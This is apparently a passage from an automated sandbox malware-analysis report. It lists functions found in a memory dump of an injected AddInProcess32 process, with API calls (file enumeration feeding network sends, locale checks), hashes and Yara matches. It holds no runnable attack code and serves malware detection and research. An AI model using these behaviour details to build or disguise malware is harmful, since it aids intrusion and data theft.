                                                                                  • API String ID: 0-248832578
                                                                                  • Opcode ID: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
                                                                                  • Instruction ID: 24926096c943187a016d953fe808ce2acf1242cb654f72e39a34338bfc4b4f1c
                                                                                  • Opcode Fuzzy Hash: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
                                                                                  • Instruction Fuzzy Hash: 0E3108719002486FEB248E79CC84EEB7BBDDB45304F14419EF858D7251EB34EE418B94
                                                                                  Function 00445E1C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID: GetLocaleInfoEx
                                                                                  • API String ID: 2299586839-2904428671
                                                                                  • Opcode ID: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
                                                                                  • Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
                                                                                  • Opcode Fuzzy Hash: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
                                                                                  • Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D
                                                                                  Function 00443700 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                                                                                  • Instruction ID: 1c47d48333aa2aee23a91f6ecd96940ee01f0d1a5fc0d697d822b355cdd05c70
                                                                                  • Opcode Fuzzy Hash: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                                                                                  • Instruction Fuzzy Hash: C4022E71E002199BEF14CFA9C8806AEF7F1EF88715F25816AE819E7341D735AE45CB84
                                                                                  Function 004068CD Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileFind$FirstNextsend
                                                                                  • String ID:
                                                                                  • API String ID: 4113138495-0
                                                                                  • Opcode ID: a7f074007be649f978420020ac925e3845266187a673ef2e5333e9e582309f19
                                                                                  • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
                                                                                  • Opcode Fuzzy Hash: a7f074007be649f978420020ac925e3845266187a673ef2e5333e9e582309f19
                                                                                  • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
                                                                                  Function 0045050B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00450506,?,?,00000008,?,?,004533BD,00000000), ref: 00450738
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionRaise
                                                                                  • String ID:
                                                                                  • API String ID: 3997070919-0
                                                                                  • Opcode ID: 5efd9235541867ec3ed9cd4b3b8e6b094e4fd6c2cbb45d95a394c96c6b6622d2
                                                                                  • Instruction ID: 84d157482befc24a690b5ca75d770a61b966f8e925af1348fa8ee8768c6acf08
                                                                                  • Opcode Fuzzy Hash: 5efd9235541867ec3ed9cd4b3b8e6b094e4fd6c2cbb45d95a394c96c6b6622d2
                                                                                  • Instruction Fuzzy Hash: C4B17B391106089FD714CF28C48AB657BE0FF48365F298659EC99CF2A2C339E996CF44
                                                                                  Function 004316FB Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0
                                                                                  • API String ID: 0-4108050209
                                                                                  • Opcode ID: a0300bf0e74490e07b48137b646e8018063fd0ad9baab8b1153cdb7e3f9059d1
                                                                                  • Instruction ID: 320eb4b805cbc27e3b43fdc18f554f89df5109ee0a66c35b650df9f3f8f200d4
                                                                                  • Opcode Fuzzy Hash: a0300bf0e74490e07b48137b646e8018063fd0ad9baab8b1153cdb7e3f9059d1
                                                                                  • Instruction Fuzzy Hash: 031241326083008BD714DF65D852A1EB3E2BFCC758F194D2EF585A73A1DB74E8168B46
                                                                                  Function 0044F4F3 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                  • String ID:
                                                                                  • API String ID: 1663032902-0
                                                                                  • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                                                                  • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
                                                                                  • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                                                                  • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
                                                                                  Function 0044F17B Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                  • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                  • String ID:
                                                                                  • API String ID: 1084509184-0
                                                                                  • Opcode ID: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                                                                                  • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
                                                                                  • Opcode Fuzzy Hash: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                                                                                  • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
                                                                                  Function 0044F723 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$InfoLocale_abort_free
                                                                                  • String ID:
                                                                                  • API String ID: 2692324296-0
                                                                                  • Opcode ID: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                                                                                  • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
                                                                                  • Opcode Fuzzy Hash: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                                                                                  • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
                                                                                  Function 0044F216 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                  • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                  • String ID:
                                                                                  • API String ID: 1084509184-0
                                                                                  • Opcode ID: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                                                                                  • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
                                                                                  • Opcode Fuzzy Hash: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                                                                                  • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
                                                                                  Function 00445914 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(-0006A42D,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                                                                                  • EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1272433827-0
                                                                                  • Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                                                                  • Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
                                                                                  • Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                                                                  • Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E
                                                                                  Function 0044F130 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                                                                    • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                    • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                                                                    • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                  • EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                  • String ID:
                                                                                  • API String ID: 1084509184-0
                                                                                  • Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                                                                                  • Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
                                                                                  • Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                                                                                  • Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754
                                                                                  Function 0040E2BB Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: 7bc4823d4125eefc11c0bf4c413f8d2ee48cbd7ba6f22e3d5f25b7b09068aca4
                                                                                  • Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
                                                                                  • Opcode Fuzzy Hash: 7bc4823d4125eefc11c0bf4c413f8d2ee48cbd7ba6f22e3d5f25b7b09068aca4
                                                                                  • Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6
                                                                                  Function 004328FC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                                                                  • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
                                                                                  • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Function 004257FB Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                                  • Instruction ID: 6198f9fd5856e2fadc0eee1ef7bf8112c6a5ea678d4112deff0a08df7cd0a8a1
                                                                                  • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                                  • Instruction Fuzzy Hash: 83410975A187458BC344CF29C58061BFBE1FFD8314F645A1EF889A3350D7B9E9828B86
                                                                                  Function 0044ABA9 Relevance: .6, Instructions: 637COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7f53e293dee35998a8249f38609762a9e2a15299405adcda504afdded652bb6e
                                                                                  • Instruction ID: ac95e4143a92ff0618d82a399ec7b133dd136baee215df138bf5792b33e3284f
                                                                                  • Opcode Fuzzy Hash: 7f53e293dee35998a8249f38609762a9e2a15299405adcda504afdded652bb6e
                                                                                  • Instruction Fuzzy Hash: 7B322621D29F414DE7239A35C872336A24CEFB73C9F15D737E81AB5AA6EB28C4834144
                                                                                  Function 0041CEAF Relevance: .6, Instructions: 598COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d20679d8ac3ad7e70548a062806f0de1d8dc5274da0d16fd74ae3c85b554e99c
                                                                                  • Instruction ID: ddb96738fd74990a51aa4d57cd7ecd2d3edd4d3efe0166ecbb7dd1f918ebfc19
                                                                                  • Opcode Fuzzy Hash: d20679d8ac3ad7e70548a062806f0de1d8dc5274da0d16fd74ae3c85b554e99c
                                                                                  • Instruction Fuzzy Hash: F832C6B1A087459BC719DF28C8807ABB7E1BF85318F04462EF89587381D778DD85CB8A
                                                                                  Function 00425152 Relevance: .4, Instructions: 435COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ec7a3ea6d300c6aabf2075570cbd280121745ad2bb37e3d1740fc1f9810f8045
                                                                                  • Instruction ID: 5c6380b7442203eb09b5b6243dbf6f2b0d892e6a2da6515435673998fb66d49f
                                                                                  • Opcode Fuzzy Hash: ec7a3ea6d300c6aabf2075570cbd280121745ad2bb37e3d1740fc1f9810f8045
                                                                                  • Instruction Fuzzy Hash: C602A471714A528FC758CF2EEC4063AB7E1AB8E306B85453EE495C7781EB34E921CB94
                                                                                  Function 00424BC3 Relevance: .4, Instructions: 383COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3d5cfc841615d404c8faad9089b9236c22e56981a6e79550f22df887260c3724
                                                                                  • Instruction ID: 9832893ecb8716a8230fb1444da9bced5d75184ca3800c066fd9b1088accf213
                                                                                  • Opcode Fuzzy Hash: 3d5cfc841615d404c8faad9089b9236c22e56981a6e79550f22df887260c3724
                                                                                  • Instruction Fuzzy Hash: CEF181356246558FC304DF1DE89192BB3E1FB89306F85092EF182C7391DB78E925CB9A
                                                                                  Function 00435AD3 Relevance: .3, Instructions: 345COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                  • Instruction ID: 656262e35da032ffd0a077b83a64e39d55d78725ba1fa3deec4bc033c2bd9230
                                                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                  • Instruction Fuzzy Hash: 21C1C1322059930ADF2D4639853503FFBE15AA67B171A2B6FD4B7CB2C4FE28C524D624
                                                                                  Function 00435F08 Relevance: .3, Instructions: 341COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                  • Instruction ID: 83a77ad86d3d882556a1d1f8a871d3d99dabfb51986f73d2778cf32764f6a177
                                                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                  • Instruction Fuzzy Hash: 7FC1E3322055930ADF2D8639C53103FBBE15AA67B171B676FD4B6CB2C4FE28C524D624
                                                                                  Function 0043569E Relevance: .3, Instructions: 331COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                  • Instruction ID: 2e2fcf76ea68e3d1ce03a604506cc299a951e5de5e734e711f809c72e20f7287
                                                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                  • Instruction Fuzzy Hash: 12C1C2322059934ADF2D4639857103FBBE15EA67B1B1A276FD4B7CB2C0FE28C524D624
                                                                                  Function 00435286 Relevance: .3, Instructions: 323COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                  • Instruction ID: cc9b1a5688ee457b4940033b23912546db57db7e3d6d8e70cc9d87b8c0cd44da
                                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                  • Instruction Fuzzy Hash: 25C1F6322059930ADF2D463AC53113FBBE15AA57B171A276FD8B7CB2C4FE28C524C614
                                                                                  Function 0041B917 Relevance: .3, Instructions: 277COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9dbd819e4762da8de2df7c29e8d62f25da32584a941b05635a818d123c504815
                                                                                  • Instruction ID: d47e39d1b20c68f472f2cbcbc0b1e5e76a9f7a6e19272067298aabf3f738eb94
                                                                                  • Opcode Fuzzy Hash: 9dbd819e4762da8de2df7c29e8d62f25da32584a941b05635a818d123c504815
                                                                                  • Instruction Fuzzy Hash: E1B184791142998ACB05EF68C4913F63BA1EF6A300F0850B9EC9CCF757E3398506EB64
                                                                                  Function 0043DE2A Relevance: .2, Instructions: 237COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
